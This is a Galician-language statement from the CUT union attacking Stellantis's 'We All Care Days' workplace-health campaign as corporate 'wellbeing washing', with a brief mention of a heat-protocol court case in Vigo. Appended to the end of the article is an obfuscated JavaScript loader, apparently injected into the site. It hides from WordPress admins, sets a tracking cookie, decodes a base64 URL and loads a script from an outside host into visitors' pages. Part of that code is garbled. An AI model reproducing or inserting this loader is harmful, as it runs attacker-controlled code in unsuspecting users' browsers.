“WE ALL CARE”
A campaña da vergoña en Stellantis.
Coincidindo coa Semana Europea da Seguridade e a Saúde, Stellantis lanza a campaña “We All Care Days” con charlas e accións de “cultura preventiva” en todas as plantas do Estado. A empresa pretende proxectar unha imaxe de responsabilidade e coidado, pero para a CUT isto non é máis que o coñecido “wellbeing washing,” un lavado de cara corporativo, maquillar con publicidade o que na realidade son problemas estruturais de saúde laboral.
Mentres se fala de benestar emocional con mensaxes motivacionais e charlas de quince minutos, a dirección continúa ignorando a raíz do problema:
- Precariedade e inseguridade laboral.

- Exceso de ritmos e presión produtiva.
- Lesións músculo-esqueléticas e enfermidades profesionais.
- Horarios imprevisibles e dificultades de conciliación.
- …
A CUT denuncia que estas campañas cargan a responsabilidade sobre as persoas traballadoras, culpabilizándoas do seu propio esgotamento, ao tempo que se ocultan riscos reais e deberes legais da empresa. A chamada “cultura preventiva” limítase a xestos simbólicos. Mentres non se introduzan cambios substanciais; reducir cargas de traballo, mellorar a ergonomía, recoñecer as enfermidades profesionais e garantir a participación e transparencia en saúde laboral, nada trocará.
A saúde é un dereito, non unha acción de márketing. O benestar non se finxe: ou se garante con medidas reais, ou non é máis que propaganda corporativa.
E si, tal e como recolle recentemente os voceiros da patronal, a CUT perdeu un xuízo en Vigo, en primeira instancia (xa está presentado o recurso) contra a empresa e o protocolo de calor que temos no centro, que coma todon é aceptado polo trío; SIT, UGT, CC.OO e no que coma sempre os seus avogados, non dubidaron en defender os intereses da empresa fronte a saúde das persoas traballadoras. Sobre este tema xa ampliaremos a información, que ben o merece…(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();















